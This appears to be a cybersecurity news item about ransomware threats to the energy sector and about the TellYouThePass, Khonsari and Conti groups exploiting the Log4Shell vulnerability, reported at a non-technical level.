So, how can big energy and utility businesses fall victim to cyber-attacks? 

Typically, ransomware attacks are used to steal commercial secrets, confidential data, and intellectual property. "The energy sector is classified as vital infrastructure. The nation's financial and physical infrastructure might be crippled if it is infiltrated," warned Avinash Advani, founder, and CEO of CyberKnight, a Dubai-based cybersecurity firm. Potential targets include oil and gas infrastructure, nuclear power plants, electricity grids, water corporations, and utility companies that provide power, water, and sewage treatment to the population. 

The Covid-19 epidemic has revealed the dark side of the energy sector. As more people work from home to stop the spread of the coronavirus, they unknowingly expose a company to cyber-attacks. The energy business should not underestimate groups who target facilities, given the devastating consequences of cyber attacks, they should focus on reinforcing their cybersecurity technology to guarantee that their firewall is safe and that any outdated, archaic computer systems and software they are employing are adequately protected.

TellYouThePass Resurges and is Now Abusing Log4j to Install Ransomware

 

TellYouThePass, one of the inactive ransomware families, has resurfaced. The ransomware is exploiting the Apache Log4j CVE-2021-44228 vulnerability to target both Linux and Windows-based computers, researchers from KnownSec 404 Team and Sangfor Threat Intelligence Team reported.

A researcher from KnownSec 404 Team first reported authorities on Twitter regarding assaults soon after discovering that the ransomware experienced a sudden surge just after the Log4Shell PoC exploits were published online, later the Sangfor security team confirmed attacks after intercepting the logs. 

“On December 13, Sangfor’s terminal security team and Anfu’s emergency response center jointly monitored ransomware called Tellyouthepass, which has attacked both platforms. Sangfor has captured a large number of Tellyouthepass ransomware interception logs” reads the analysis published by Sangfor. 

It's worth noting that this is not the first instance that Tellyouthepass ransomware has employed severe flaws to launch assaults. As early as last year, the ransomware used Eternal Blue bugs to target multiple organizational units. 

Cybersecurity researchers received 30 samples of TellYouThePass ransomware on December 13, which is relatively high considering the ransomware has remained inactive since the summer of 2020. According to Curated Intelligence, ID-Ransomware (IDR) metric confirmed a surge in the submissions for this ransomware. 

“Curated Intel member @PolarToffee responded with an ID-Ransomware (IDR) metric, proving that on December 13th, more than 30 samples of “TellYouThePass” ransomware were submitted to IDR, indicating that “a very sudden spike in submissions for what is a very old ransomware [that day],” reported Curated Intelligence. 

In recent months, there have been multiple incidents where attackers have exploited the Log4Shell vulnerability. Initially, the flaw was exploited by multiple state-sponsored attackers from China, Iran, North Korea, and Turkey. The financially driven attackers started injecting Monero miners on compromised devices and state-backed hackers began leveraging it to establish footholds for further operations. 

Khonsari ransomware payloads were also identified on self-hosted Minecraft servers by the BitDefender Threat Intelligence Team. The ransomware doesn’t encrypt files with the extensions .ini and .lnk, it employs the AES 128 CBC using PaddingMode.Zeros algorithm for encryption. 

Finally, Conti ransomware gang has added a Log4Shell attack in its armory, allowing attackers to move laterally throughout victims’ networks, secure access to VMware vCenter Server instances, and encrypt virtual machines.